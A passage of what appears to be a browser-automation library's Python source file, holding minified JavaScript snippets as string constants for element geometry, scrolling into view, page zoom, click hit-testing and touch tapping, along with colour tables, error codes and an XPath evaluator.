"GET_EFFECTIVE_STYLE", \
"GET_IN_VIEW_LOCATION", \
"GET_LOCAL_STORAGE_ITEM", \
"GET_LOCAL_STORAGE_KEY", \
"GET_LOCAL_STORAGE_KEYS", \
"GET_LOCAL_STORAGE_SIZE", \
"GET_SESSION_STORAGE_ITEM", \
"GET_SESSION_STORAGE_KEY", \
"GET_SESSION_STORAGE_KEYS", \
"GET_SESSION_STORAGE_SIZE", \
"GET_LOCATION", \
"GET_SIZE", \
"GET_TEXT", \
"IS_DISPLAYED", \
"IS_ENABLED", \
"IS_ONLINE", \
"IS_SELECTED", \
"REMOVE_LOCAL_STORAGE_ITEM", \
"REMOVE_SESSION_STORAGE_ITEM", \
"SET_LOCAL_STORAGE_ITEM", \
"SET_SESSION_STORAGE_ITEM", \
"SUBMIT"]
GET_FIRST_CLIENT_RECT = \
"function(){return function(){var g=this;\nfunction h(a){var b=typeof a;"\
"if(\"object\"==b)if(a){if(a instanceof Array)return\"array\";if(a insta"\
"nceof Object)return b;var e=Object.prototype.toString.call(a);if(\"[obj"\
"ect Window]\"==e)return\"object\";if(\"[object Array]\"==e||\"number\"="\
"=typeof a.length&&\"undefined\"!=typeof a.splice&&\"undefined\"!=typeof"\
" a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"splice\"))return\"ar"\
"ray\";if(\"[object Function]\"==e||\"undefined\"!=typeof a.call&&\"unde"\
"fined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"call"\
"\"))return\"function\"}else return\"null\";else if(\"function\"==\nb&&"\
"\"undefined\"==typeof a.call)return\"object\";return b};var k;function "\
"l(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}l.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};function m(a){retur"\
"n 9==a.nodeType?a:a.ownerDocument||a.document}function n(a){this.b=a||g"\
".document||document}function p(a){var b=a.b;a=b.body;b=b.parentWindow||"\
"b.defaultView;return new l(b.pageXOffset||a.scrollLeft,b.pageYOffset||a"\
".scrollTop)};function q(a,b,e,d){this.left=a;this.top=b;this.width=e;th"\
"is.height=d}q.prototype.toString=function(){return\"(\"+this.left+\", "\
"\"+this.top+\" - \"+this.width+\"w x \"+this.height+\"h)\"};function s("\
"a){var b;a:{b=m(a);if(b.defaultView&&b.defaultView.getComputedStyle&&(b"\
"=b.defaultView.getComputedStyle(a,null))){b=b.position||b.getPropertyVa"\
"lue(\"position\")||\"\";break a}b=\"\"}return b||(a.currentStyle?a.curr"\
"entStyle.position:null)||a.style&&a.style.position}function t(a){var b;"\
"try{b=a.getBoundingClientRect()}catch(e){return{left:0,top:0,right:0,bo"\
"ttom:0}}return b}\nfunction u(a){var b=m(a),e=s(a),d=\"fixed\"==e||\"ab"\
"solute\"==e;for(a=a.parentNode;a&&a!=b;a=a.parentNode)if(e=s(a),d=d&&\""\
"static\"==e&&a!=b.documentElement&&a!=b.body,!d&&(a.scrollWidth>a.clien"\
"tWidth||a.scrollHeight>a.clientHeight||\"fixed\"==e||\"absolute\"==e||"\
"\"relative\"==e))return a;return null};function v(a){var b=a.getClientR"\
"ects();if(0==b.length)throw Error(\"Element does not have any client re"\
"cts\");b=b[0];if(1==a.nodeType)if(a.getBoundingClientRect)a=t(a),a=new "\
"l(a.left,a.top);else{var e=p(a?new n(m(a)):k||(k=new n));var d=m(a),z=s"\
"(a),c=new l(0,0),r=(d?m(d):document).documentElement;if(a!=r)if(a.getBo"\
"undingClientRect)a=t(a),d=p(d?new n(m(d)):k||(k=new n)),c.x=a.left+d.x,"\
"c.y=a.top+d.y;else if(d.getBoxObjectFor)a=d.getBoxObjectFor(a),d=d.getB"\
"oxObjectFor(r),c.x=a.screenX-d.screenX,c.y=a.screenY-\nd.screenY;else{v"\
"ar f=a;do{c.x+=f.offsetLeft;c.y+=f.offsetTop;f!=a&&(c.x+=f.clientLeft||"\
"0,c.y+=f.clientTop||0);if(\"fixed\"==s(f)){c.x+=d.body.scrollLeft;c.y+="\
"d.body.scrollTop;break}f=f.offsetParent}while(f&&f!=a);\"absolute\"==z&"\
"&(c.y-=d.body.offsetTop);for(f=a;(f=u(f))&&f!=d.body&&f!=r;)c.x-=f.scro"\
"llLeft,c.y-=f.scrollTop}a=new l(c.x-e.x,c.y-e.y)}else e=\"function\"==h"\
"(a.a),c=a,a.targetTouches?c=a.targetTouches[0]:e&&a.a().targetTouches&&"\
"(c=a.a().targetTouches[0]),a=new l(c.clientX,c.clientY);return new q(b."\
"left-\na.x,b.top-a.y,b.right-b.left,b.bottom-b.top)}var w=[\"_\"],x=g;w"\
"[0]in x||!x.execScript||x.execScript(\"var \"+w[0]);for(var y;w.length&"\
"&(y=w.shift());)w.length||void 0===v?x=x[y]?x[y]:x[y]={}:x[y]=v;; retur"\
"n this._.apply(null,arguments);}.apply({navigator:typeof window!=undefi"\
"ned?window.navigator:null,document:typeof window!=undefined?window.docu"\
"ment:null}, arguments);}"
GET_LOCATION_IN_VIEW = \
"function(){return function(){var k=this;\nfunction l(a){var b=typeof a;"\
"if(\"object\"==b)if(a){if(a instanceof Array)return\"array\";if(a insta"\
"nceof Object)return b;var c=Object.prototype.toString.call(a);if(\"[obj"\
"ect Window]\"==c)return\"object\";if(\"[object Array]\"==c||\"number\"="\
"=typeof a.length&&\"undefined\"!=typeof a.splice&&\"undefined\"!=typeof"\
" a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"splice\"))return\"ar"\
"ray\";if(\"[object Function]\"==c||\"undefined\"!=typeof a.call&&\"unde"\
"fined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerable(\"call"\
"\"))return\"function\"}else return\"null\";else if(\"function\"==\nb&&"\
"\"undefined\"==typeof a.call)return\"object\";return b};var m;function "\
"n(a,b){this.x=void 0!==a?a:0;this.y=void 0!==b?b:0}n.prototype.toString"\
"=function(){return\"(\"+this.x+\", \"+this.y+\")\"};function p(a,b){thi"\
"s.width=a;this.height=b}p.prototype.toString=function(){return\"(\"+thi"\
"s.width+\" x \"+this.height+\")\"};function q(a){return a?new r(s(a)):m"\
"||(m=new r)}function s(a){return 9==a.nodeType?a:a.ownerDocument||a.doc"\
"ument}function r(a){this.a=a||k.document||document}function t(a){a=(a.a"\
".parentWindow||a.a.defaultView||window).document;a=\"CSS1Compat\"==a.co"\
"mpatMode?a.documentElement:a.body;return new p(a.clientWidth,a.clientHe"\
"ight)}function u(a){var b=a.a;a=b.body;b=b.parentWindow||b.defaultView;"\
"return new n(b.pageXOffset||a.scrollLeft,b.pageYOffset||a.scrollTop)};f"\
"unction v(a,b,c,d){this.top=a;this.right=b;this.bottom=c;this.left=d}v."\
"prototype.toString=function(){return\"(\"+this.top+\"t, \"+this.right+"\
"\"r, \"+this.bottom+\"b, \"+this.left+\"l)\"};function w(a,b,c,d){this."\
"left=a;this.top=b;this.width=c;this.height=d}w.prototype.toString=funct"\
"ion(){return\"(\"+this.left+\", \"+this.top+\" - \"+this.width+\"w x \""\
"+this.height+\"h)\"};function x(a,b){var c=s(a);return c.defaultView&&c"\
".defaultView.getComputedStyle&&(c=c.defaultView.getComputedStyle(a,null"\
"))?c[b]||c.getPropertyValue(b)||\"\":\"\"}function y(a){return x(a,\"po"\
"sition\")||(a.currentStyle?a.currentStyle.position:null)||a.style&&a.st"\
"yle.position}function z(a){var b;try{b=a.getBoundingClientRect()}catch("\
"c){return{left:0,top:0,right:0,bottom:0}}return b}\nfunction A(a){var b"\
"=s(a),c=y(a),d=\"fixed\"==c||\"absolute\"==c;for(a=a.parentNode;a&&a!=b"\
";a=a.parentNode)if(c=y(a),d=d&&\"static\"==c&&a!=b.documentElement&&a!="\
"b.body,!d&&(a.scrollWidth>a.clientWidth||a.scrollHeight>a.clientHeight|"\
"|\"fixed\"==c||\"absolute\"==c||\"relative\"==c))return a;return null}"\
"\nfunction B(a){var b=s(a),c=y(a),d=new n(0,0),f=(b?s(b):document).docu"\
"mentElement;if(a==f)return d;if(a.getBoundingClientRect)a=z(a),b=u(q(b)"\
"),d.x=a.left+b.x,d.y=a.top+b.y;else if(b.getBoxObjectFor)a=b.getBoxObje"\
"ctFor(a),b=b.getBoxObjectFor(f),d.x=a.screenX-b.screenX,d.y=a.screenY-b"\
".screenY;else{var e=a;do{d.x+=e.offsetLeft;d.y+=e.offsetTop;e!=a&&(d.x+"\
"=e.clientLeft||0,d.y+=e.clientTop||0);if(\"fixed\"==y(e)){d.x+=b.body.s"\
"crollLeft;d.y+=b.body.scrollTop;break}e=e.offsetParent}while(e&&e!=a);"\
"\"absolute\"==\nc&&(d.y-=b.body.offsetTop);for(e=a;(e=A(e))&&e!=b.body&"\
"&e!=f;)d.x-=e.scrollLeft,d.y-=e.scrollTop}return d}function C(a){if(1=="\
"a.nodeType){if(a.getBoundingClientRect)a=z(a),a=new n(a.left,a.top);els"\
"e{var b=u(q(a));a=B(a);a=new n(a.x-b.x,a.y-b.y)}return a}var b=\"functi"\
"on\"==l(a.b),c=a;a.targetTouches?c=a.targetTouches[0]:b&&a.b().targetTo"\
"uches&&(c=a.b().targetTouches[0]);return new n(c.clientX,c.clientY)};fu"\
"nction D(a,b){var c;c=B(b);var d=B(a);c=new n(c.x-d.x,c.y-d.y);var f,e,"\
"h;h=x(a,\"borderLeftWidth\");e=x(a,\"borderRightWidth\");f=x(a,\"border"\
"TopWidth\");d=x(a,\"borderBottomWidth\");d=new v(parseFloat(f),parseFlo"\
"at(e),parseFloat(d),parseFloat(h));c.x-=d.left;c.y-=d.top;return c}\nfu"\
"nction E(a,b,c){function d(a,b,c,d,e){d=new w(c.x+d.left,c.y+d.top,d.wi"\
"dth,d.height);c=[0,0];b=[b.width,b.height];var f=[d.left,d.top];d=[d.wi"\
"dth,d.height];for(var g=0;2>g;g++)if(d[g]>b[g])c[g]=e?f[g]+d[g]/2-b[g]/"\
"2:f[g];else{var h=f[g]-b[g]+d[g];0<h?c[g]=h:0>f[g]&&(c[g]=f[g])}e=new n"\
"(c[0],c[1]);a.scrollLeft+=e.x;a.scrollTop+=e.y}for(var f=s(a),e=a.paren"\
"tNode,h;e&&e!=f.documentElement&&e!=f.body;)h=D(e,a),d(e,new p(e.client"\
"Width,e.clientHeight),h,b,c),e=e.parentNode;h=C(a);a=t(q(a));d(f.body,a"\
",h,\nb,c)};function F(a,b,c){c||(c=new w(0,0,a.offsetWidth,a.offsetHeig"\
"ht));E(a,c,b);a=C(a);return new n(a.x+c.left,a.y+c.top)}var G=[\"_\"],H"\
"=k;G[0]in H||!H.execScript||H.execScript(\"var \"+G[0]);for(var I;G.len"\
"gth&&(I=G.shift());)G.length||void 0===F?H=H[I]?H[I]:H[I]={}:H[I]=F;; r"\
"eturn this._.apply(null,arguments);}.apply({navigator:typeof window!=un"\
"defined?window.navigator:null,document:typeof window!=undefined?window."\
"document:null}, arguments);}"
# Machine-generated, minified JavaScript snippet stored as string data --
# do not edit by hand (presumably emitted by a Closure-compiler atoms build;
# TODO confirm provenance).  The script computes the page zoom factor as
# document.width divided by the largest of the documentElement's
# clientWidth/offsetWidth/scrollWidth.
GET_PAGE_ZOOM = \
"function(){return function(){function a(b){b=9==b.nodeType?b:b.ownerDoc"\
"ument||b.document;var c=b.documentElement,c=Math.max(c.clientWidth,c.of"\
"fsetWidth,c.scrollWidth);return b.width/c}var d=[\"_\"],e=this;d[0]in e"\
"||!e.execScript||e.execScript(\"var \"+d[0]);for(var f;d.length&&(f=d.s"\
"hift());)d.length||void 0===a?e=e[f]?e[f]:e[f]={}:e[f]=a;; return this."\
"_.apply(null,arguments);}.apply({navigator:typeof window!=undefined?win"\
"dow.navigator:null,document:typeof window!=undefined?window.document:nu"\
"ll}, arguments);}"
# Machine-generated, minified JavaScript snippet stored as string data --
# do not edit by hand.  The script hit-tests document.elementFromPoint(x, y)
# against the target element and returns an object {clickable: bool,
# message: str} describing which element would actually receive a click at
# that point.
IS_ELEMENT_CLICKABLE = \
"function(){return function(){function c(h,d){function g(a,b){var d={cli"\
"ckable:a};b&&(d.message=b);return d}var a=h.ownerDocument.elementFromPo"\
"int(d.x,d.y);if(a==h)return g(!0);var l=\"(\"+d.x+\", \"+d.y+\")\";if(n"\
"ull==a)return g(!1,\"Element is not clickable at point \"+l);var b=a.ou"\
"terHTML;if(a.hasChildNodes())var m=a.innerHTML,n=b.length-m.length-(\"<"\
"/\"+a.tagName+\">\").length,b=b.substring(0,n)+\"...\"+b.substring(n+m."\
"length);for(a=a.parentNode;a;){if(a==h)return g(!0,\"Element's descenda"\
"nt would receive the click. Consider clicking the descendant instead. D"\
"escendant: \"+\nb);a=a.parentNode}return g(!1,\"Element is not clickabl"\
"e at point \"+l+\". Other element would receive the click: \"+b)}var e="\
"[\"_\"],f=this;e[0]in f||!f.execScript||f.execScript(\"var \"+e[0]);for"\
"(var k;e.length&&(k=e.shift());)e.length||void 0===c?f=f[k]?f[k]:f[k]={"\
"}:f[k]=c;; return this._.apply(null,arguments);}.apply({navigator:typeo"\
"f window!=undefined?window.navigator:null,document:typeof window!=undef"\
"ined?window.document:null}, arguments);}"
TOUCH_SINGLE_TAP = \
"function(){return function(){function aa(a){return function(){return th"\
"is[a]}}function ba(a){return function(){return a}}var g,k=this;\nfuncti"\
"on ca(a){var b=typeof a;if(\"object\"==b)if(a){if(a instanceof Array)re"\
"turn\"array\";if(a instanceof Object)return b;var c=Object.prototype.to"\
"String.call(a);if(\"[object Window]\"==c)return\"object\";if(\"[object "\
"Array]\"==c||\"number\"==typeof a.length&&\"undefined\"!=typeof a.splic"\
"e&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.propertyIsEnumerabl"\
"e(\"splice\"))return\"array\";if(\"[object Function]\"==c||\"undefined"\
"\"!=typeof a.call&&\"undefined\"!=typeof a.propertyIsEnumerable&&!a.pro"\
"pertyIsEnumerable(\"call\"))return\"function\"}else return\"null\";\nel"\
"se if(\"function\"==b&&\"undefined\"==typeof a.call)return\"object\";re"\
"turn b}function l(a){return void 0!==a}function m(a){return\"string\"=="\
"typeof a}function da(a){return\"number\"==typeof a}function p(a){return"\
"\"function\"==ca(a)}function r(a,b){function c(){}c.prototype=b.prototy"\
"pe;a.ha=b.prototype;a.prototype=new c};var ea=window;function fa(a){ret"\
"urn String(a).replace(/\\-([a-z])/g,function(a,c){return c.toUpperCase("\
")})};var ga=Array.prototype;function s(a,b){for(var c=a.length,d=m(a)?a"\
".split(\"\"):a,e=0;e<c;e++)e in d&&b.call(void 0,d[e],e,a)}function ha("\
"a,b){for(var c=a.length,d=Array(c),e=m(a)?a.split(\"\"):a,f=0;f<c;f++)f"\
" in e&&(d[f]=b.call(void 0,e[f],f,a));return d}function ia(a,b){if(a.re"\
"duce)return a.reduce(b,\"\");var c=\"\";s(a,function(d,e){c=b.call(void"\
" 0,c,d,e,a)});return c}function ja(a,b){for(var c=a.length,d=m(a)?a.spl"\
"it(\"\"):a,e=0;e<c;e++)if(e in d&&b.call(void 0,d[e],e,a))return!0;retu"\
"rn!1}\nfunction ka(a,b){var c;a:if(m(a))c=m(b)&&1==b.length?a.indexOf(b"\
",0):-1;else{for(c=0;c<a.length;c++)if(c in a&&a[c]===b)break a;c=-1}ret"\
"urn 0<=c}function la(a,b,c){return 2>=arguments.length?ga.slice.call(a,"\
"b):ga.slice.call(a,b,c)};var ma={aliceblue:\"#f0f8ff\",antiquewhite:\"#"\
"faebd7\",aqua:\"#00ffff\",aquamarine:\"#7fffd4\",azure:\"#f0ffff\",beig"\
"e:\"#f5f5dc\",bisque:\"#ffe4c4\",black:\"#000000\",blanchedalmond:\"#ff"\
"ebcd\",blue:\"#0000ff\",blueviolet:\"#8a2be2\",brown:\"#a52a2a\",burlyw"\
"ood:\"#deb887\",cadetblue:\"#5f9ea0\",chartreuse:\"#7fff00\",chocolate:"\
"\"#d2691e\",coral:\"#ff7f50\",cornflowerblue:\"#6495ed\",cornsilk:\"#ff"\
"f8dc\",crimson:\"#dc143c\",cyan:\"#00ffff\",darkblue:\"#00008b\",darkcy"\
"an:\"#008b8b\",darkgoldenrod:\"#b8860b\",darkgray:\"#a9a9a9\",darkgreen"\
":\"#006400\",\ndarkgrey:\"#a9a9a9\",darkkhaki:\"#bdb76b\",darkmagenta:"\
"\"#8b008b\",darkolivegreen:\"#556b2f\",darkorange:\"#ff8c00\",darkorchi"\
"d:\"#9932cc\",darkred:\"#8b0000\",darksalmon:\"#e9967a\",darkseagreen:"\
"\"#8fbc8f\",darkslateblue:\"#483d8b\",darkslategray:\"#2f4f4f\",darksla"\
"tegrey:\"#2f4f4f\",darkturquoise:\"#00ced1\",darkviolet:\"#9400d3\",dee"\
"ppink:\"#ff1493\",deepskyblue:\"#00bfff\",dimgray:\"#696969\",dimgrey:"\
"\"#696969\",dodgerblue:\"#1e90ff\",firebrick:\"#b22222\",floralwhite:\""\
"#fffaf0\",forestgreen:\"#228b22\",fuchsia:\"#ff00ff\",gainsboro:\"#dcdc"\
"dc\",\nghostwhite:\"#f8f8ff\",gold:\"#ffd700\",goldenrod:\"#daa520\",gr"\
"ay:\"#808080\",green:\"#008000\",greenyellow:\"#adff2f\",grey:\"#808080"\
"\",honeydew:\"#f0fff0\",hotpink:\"#ff69b4\",indianred:\"#cd5c5c\",indig"\
"o:\"#4b0082\",ivory:\"#fffff0\",khaki:\"#f0e68c\",lavender:\"#e6e6fa\","\
"lavenderblush:\"#fff0f5\",lawngreen:\"#7cfc00\",lemonchiffon:\"#fffacd"\
"\",lightblue:\"#add8e6\",lightcoral:\"#f08080\",lightcyan:\"#e0ffff\",l"\
"ightgoldenrodyellow:\"#fafad2\",lightgray:\"#d3d3d3\",lightgreen:\"#90e"\
"e90\",lightgrey:\"#d3d3d3\",lightpink:\"#ffb6c1\",lightsalmon:\"#ffa07a"\
"\",\nlightseagreen:\"#20b2aa\",lightskyblue:\"#87cefa\",lightslategray:"\
"\"#778899\",lightslategrey:\"#778899\",lightsteelblue:\"#b0c4de\",light"\
"yellow:\"#ffffe0\",lime:\"#00ff00\",limegreen:\"#32cd32\",linen:\"#faf0"\
"e6\",magenta:\"#ff00ff\",maroon:\"#800000\",mediumaquamarine:\"#66cdaa"\
"\",mediumblue:\"#0000cd\",mediumorchid:\"#ba55d3\",mediumpurple:\"#9370"\
"db\",mediumseagreen:\"#3cb371\",mediumslateblue:\"#7b68ee\",mediumsprin"\
"ggreen:\"#00fa9a\",mediumturquoise:\"#48d1cc\",mediumvioletred:\"#c7158"\
"5\",midnightblue:\"#191970\",mintcream:\"#f5fffa\",mistyrose:\"#ffe4e1"\
"\",\nmoccasin:\"#ffe4b5\",navajowhite:\"#ffdead\",navy:\"#000080\",oldl"\
"ace:\"#fdf5e6\",olive:\"#808000\",olivedrab:\"#6b8e23\",orange:\"#ffa50"\
"0\",orangered:\"#ff4500\",orchid:\"#da70d6\",palegoldenrod:\"#eee8aa\","\
"palegreen:\"#98fb98\",paleturquoise:\"#afeeee\",palevioletred:\"#db7093"\
"\",papayawhip:\"#ffefd5\",peachpuff:\"#ffdab9\",peru:\"#cd853f\",pink:"\
"\"#ffc0cb\",plum:\"#dda0dd\",powderblue:\"#b0e0e6\",purple:\"#800080\","\
"red:\"#ff0000\",rosybrown:\"#bc8f8f\",royalblue:\"#4169e1\",saddlebrown"\
":\"#8b4513\",salmon:\"#fa8072\",sandybrown:\"#f4a460\",seagreen:\"#2e8b"\
"57\",\nseashell:\"#fff5ee\",sienna:\"#a0522d\",silver:\"#c0c0c0\",skybl"\
"ue:\"#87ceeb\",slateblue:\"#6a5acd\",slategray:\"#708090\",slategrey:\""\
"#708090\",snow:\"#fffafa\",springgreen:\"#00ff7f\",steelblue:\"#4682b4"\
"\",tan:\"#d2b48c\",teal:\"#008080\",thistle:\"#d8bfd8\",tomato:\"#ff634"\
"7\",turquoise:\"#40e0d0\",violet:\"#ee82ee\",wheat:\"#f5deb3\",white:\""\
"#ffffff\",whitesmoke:\"#f5f5f5\",yellow:\"#ffff00\",yellowgreen:\"#9acd"\
"32\"};var na=\"background-color border-top-color border-right-color bor"\
"der-bottom-color border-left-color color outline-color\".split(\" \"),o"\
"a=/#([0-9a-fA-F])([0-9a-fA-F])([0-9a-fA-F])/;function pa(a){if(!qa.test"\
"(a))throw Error(\"'\"+a+\"' is not a valid hex color\");4==a.length&&(a"\
"=a.replace(oa,\"#$1$1$2$2$3$3\"));return a.toLowerCase()}var qa=/^#(?:["\
"0-9a-f]{3}){1,2}$/i,ra=/^(?:rgba)?\\((\\d{1,3}),\\s?(\\d{1,3}),\\s?(\\d"\
"{1,3}),\\s?(0|1|0\\.\\d*)\\)$/i;\nfunction sa(a){var b=a.match(ra);if(b"\
"){a=Number(b[1]);var c=Number(b[2]),d=Number(b[3]),b=Number(b[4]);if(0<"\
"=a&&255>=a&&0<=c&&255>=c&&0<=d&&255>=d&&0<=b&&1>=b)return[a,c,d,b]}retu"\
"rn[]}var ta=/^(?:rgb)?\\((0|[1-9]\\d{0,2}),\\s?(0|[1-9]\\d{0,2}),\\s?(0"\
"|[1-9]\\d{0,2})\\)$/i;function ua(a){var b=a.match(ta);if(b){a=Number(b"\
"[1]);var c=Number(b[2]),b=Number(b[3]);if(0<=a&&255>=a&&0<=c&&255>=c&&0"\
"<=b&&255>=b)return[a,c,b]}return[]};function t(a,b){this.code=a;this.st"\
"ate=va[a]||xa;this.message=b||\"\";var c=this.state.replace(/((?:^|\\s+"\
")[a-z])/g,function(a){return a.toUpperCase().replace(/^[\\s\\xa0]+/g,\""\
"\")}),d=c.length-5;if(0>d||c.indexOf(\"Error\",d)!=d)c+=\"Error\";this."\
"name=c;c=Error(this.message);c.name=this.name;this.stack=c.stack||\"\"}"\
"r(t,Error);\nvar xa=\"unknown error\",va={15:\"element not selectable\""\
",11:\"element not visible\",31:\"ime engine activation failed\",30:\"im"\
"e not available\",24:\"invalid cookie domain\",29:\"invalid element coo"\
"rdinates\",12:\"invalid element state\",32:\"invalid selector\",51:\"in"\
"valid selector\",52:\"invalid selector\",17:\"javascript error\",405:\""\
"unsupported operation\",34:\"move target out of bounds\",27:\"no such a"\
"lert\",7:\"no such element\",8:\"no such frame\",23:\"no such window\","\
"28:\"script timeout\",33:\"session not created\",10:\"stale element ref"\
"erence\",\n0:\"success\",21:\"timeout\",25:\"unable to set cookie\",26:"\
"\"unexpected alert open\"};va[13]=xa;va[9]=\"unknown command\";t.protot"\
"ype.toString=function(){return this.name+\": \"+this.message};var ya,za"\
",Aa,Ba=k.navigator;Aa=Ba&&Ba.platform||\"\";ya=-1!=Aa.indexOf(\"Mac\");"\
"za=-1!=Aa.indexOf(\"Win\");var u=-1!=Aa.indexOf(\"Linux\");var Ca;funct"\
"ion v(a,b){this.x=l(a)?a:0;this.y=l(b)?b:0}g=v.prototype;g.toString=fun"\
"ction(){return\"(\"+this.x+\", \"+this.y+\")\"};g.ceil=function(){this."\
"x=Math.ceil(this.x);this.y=Math.ceil(this.y);return this};g.floor=funct"\
"ion(){this.x=Math.floor(this.x);this.y=Math.floor(this.y);return this};"\
"g.round=function(){this.x=Math.round(this.x);this.y=Math.round(this.y);"\
"return this};g.scale=function(a,b){var c=da(b)?b:a;this.x*=a;this.y*=c;"\
"return this};function Da(a,b){this.width=a;this.height=b}g=Da.prototype"\
";g.toString=function(){return\"(\"+this.width+\" x \"+this.height+\")\""\
"};g.ceil=function(){this.width=Math.ceil(this.width);this.height=Math.c"\
"eil(this.height);return this};g.floor=function(){this.width=Math.floor("\
"this.width);this.height=Math.floor(this.height);return this};g.round=fu"\
"nction(){this.width=Math.round(this.width);this.height=Math.round(this."\
"height);return this};g.scale=function(a,b){var c=da(b)?b:a;this.width*="\
"a;this.height*=c;return this};var Ea=3;function Fa(a){for(;a&&1!=a.node"\
"Type;)a=a.previousSibling;return a}function Ga(a,b){if(a.contains&&1==b"\
".nodeType)return a==b||a.contains(b);if(\"undefined\"!=typeof a.compare"\
"DocumentPosition)return a==b||Boolean(a.compareDocumentPosition(b)&16);"\
"for(;b&&a!=b;)b=b.parentNode;return b==a}\nfunction Ha(a,b){if(a==b)ret"\
"urn 0;if(a.compareDocumentPosition)return a.compareDocumentPosition(b)&"\
"2?1:-1;if(\"sourceIndex\"in a||a.parentNode&&\"sourceIndex\"in a.parent"\
"Node){var c=1==a.nodeType,d=1==b.nodeType;if(c&&d)return a.sourceIndex-"\
"b.sourceIndex;var e=a.parentNode,f=b.parentNode;return e==f?Ia(a,b):!c&"\
"&Ga(e,b)?-1*Ja(a,b):!d&&Ga(f,a)?Ja(b,a):(c?a.sourceIndex:e.sourceIndex)"\
"-(d?b.sourceIndex:f.sourceIndex)}d=w(a);c=d.createRange();c.selectNode("\
"a);c.collapse(!0);d=d.createRange();d.selectNode(b);\nd.collapse(!0);re"\
"turn c.compareBoundaryPoints(k.Range.START_TO_END,d)}function Ja(a,b){v"\
"ar c=a.parentNode;if(c==b)return-1;for(var d=b;d.parentNode!=c;)d=d.par"\
"entNode;return Ia(d,a)}function Ia(a,b){for(var c=b;c=c.previousSibling"\
";)if(c==a)return-1;return 1}function w(a){return 9==a.nodeType?a:a.owne"\
"rDocument||a.document}function Ka(a,b,c){c||(a=a.parentNode);for(c=0;a;"\
"){if(b(a))return a;a=a.parentNode;c++}return null}function La(a){try{re"\
"turn a&&a.activeElement}catch(b){}return null}\nfunction x(a){this.P=a|"\
"|k.document||document}function Ma(a){var b=a.P;a=b.body;b=b.parentWindo"\
"w||b.defaultView;return new v(b.pageXOffset||a.scrollLeft,b.pageYOffset"\
"||a.scrollTop)}x.prototype.contains=Ga;function y(a){var b=null,c=a.nod"\
"eType;1==c&&(b=a.textContent,b=void 0==b||null==b?a.innerText:b,b=void "\
"0==b||null==b?\"\":b);if(\"string\"!=typeof b)if(9==c||1==c){a=9==c?a.d"\
"ocumentElement:a.firstChild;for(var c=0,d=[],b=\"\";a;){do 1!=a.nodeTyp"\
"e&&(b+=a.nodeValue),d[c++]=a;while(a=a.firstChild);for(;c&&!(a=d[--c].n"\
"extSibling););}}else b=a.nodeValue;return\"\"+b}\nfunction z(a,b,c){if("\
"null===b)return!0;try{if(!a.getAttribute)return!1}catch(d){return!1}ret"\
"urn null==c?!!a.getAttribute(b):a.getAttribute(b,2)==c}function Na(a,b,"\
"c,d,e){return Oa.call(null,a,b,m(c)?c:null,m(d)?d:null,e||new B)}\nfunc"\
"tion Oa(a,b,c,d,e){b.getElementsByName&&d&&\"name\"==c?(b=b.getElements"\
"ByName(d),s(b,function(b){a.matches(b)&&e.add(b)})):b.getElementsByClas"\
"sName&&d&&\"class\"==c?(b=b.getElementsByClassName(d),s(b,function(b){b"\
".className==d&&a.matches(b)&&e.add(b)})):b.getElementsByTagName&&(b=b.g"\
"etElementsByTagName(a.getName()),s(b,function(a){z(a,c,d)&&e.add(a)}));"\
"return e}function Pa(a,b,c,d,e){for(b=b.firstChild;b;b=b.nextSibling)z("\
"b,c,d)&&a.matches(b)&&e.add(b);return e}\nfunction Qa(a,b,c,d,e){for(b="\
"b.firstChild;b;b=b.nextSibling)z(b,c,d)&&a.matches(b)&&e.add(b),Qa(a,b,"\
"c,d,e)};function B(){this.h=this.g=null;this.p=0}function Ra(a){this.J="\
"a;this.next=this.B=null}B.prototype.unshift=function(a){a=new Ra(a);a.n"\
"ext=this.g;this.h?this.g.B=a:this.g=this.h=a;this.g=a;this.p++};B.proto"\
"type.add=function(a){a=new Ra(a);a.B=this.h;this.g?this.h.next=a:this.g"\
"=this.h=a;this.h=a;this.p++};function Sa(a){return(a=a.g)?a.J:null}func"\
"tion Ta(a){return(a=Sa(a))?y(a):\"\"}function C(a,b){this.ca=a;this.F=("\
"this.K=b)?a.h:a.g;this.Q=null}\nC.prototype.next=function(){var a=this."\
"F;if(null==a)return null;var b=this.Q=a;this.F=this.K?a.B:a.next;return"\
" b.J};function D(a,b){var c=a.evaluate(b);return c instanceof B?+Ta(c):"\
"+c}function E(a,b){var c=a.evaluate(b);return c instanceof B?Ta(c):\"\""\
"+c}function H(a,b){var c=a.evaluate(b);return c instanceof B?!!c.p:!!c}"\
";function I(a,b,c,d,e){b=b.evaluate(d);c=c.evaluate(d);var f;if(b insta"\
"nceof B&&c instanceof B){e=new C(b,!1);for(d=e.next();d;d=e.next())for("\
"b=new C(c,!1),f=b.next();f;f=b.next())if(a(y(d),y(f)))return!0;return!1"\
"}if(b instanceof B||c instanceof B){b instanceof B?e=b:(e=c,c=b);e=new "\
"C(e,!1);b=typeof c;for(d=e.next();d;d=e.next()){switch(b){case \"number"\
"\":d=+y(d);break;case \"boolean\":d=!!y(d);break;case \"string\":d=y(d)"\
";break;default:throw Error(\"Illegal primitive type for comparison.\");"\
"}if(a(d,c))return!0}return!1}return e?\n\"boolean\"==typeof b||\"boolea"\
"n\"==typeof c?a(!!b,!!c):\"number\"==typeof b||\"number\"==typeof c?a(+"\
"b,+c):a(b,c):a(+b,+c)}function Ua(a,b,c,d){this.R=a;this.fa=b;this.O=c;"\
"this.o=d}Ua.prototype.toString=aa(\"R\");var Va={};function J(a,b,c,d){"\
"if(a in Va)throw Error(\"Binary operator already created: \"+a);a=new U"\
"a(a,b,c,d);Va[a.toString()]=a}J(\"div\",6,1,function(a,b,c){return D(a,"\
"c)/D(b,c)});J(\"mod\",6,1,function(a,b,c){return D(a,c)%D(b,c)});J(\"*"\
"\",6,1,function(a,b,c){return D(a,c)*D(b,c)});\nJ(\"+\",5,1,function(a,"\
"b,c){return D(a,c)+D(b,c)});J(\"-\",5,1,function(a,b,c){return D(a,c)-D"\
"(b,c)});J(\"<\",4,2,function(a,b,c){return I(function(a,b){return a<b},"\
"a,b,c)});J(\">\",4,2,function(a,b,c){return I(function(a,b){return a>b}"\
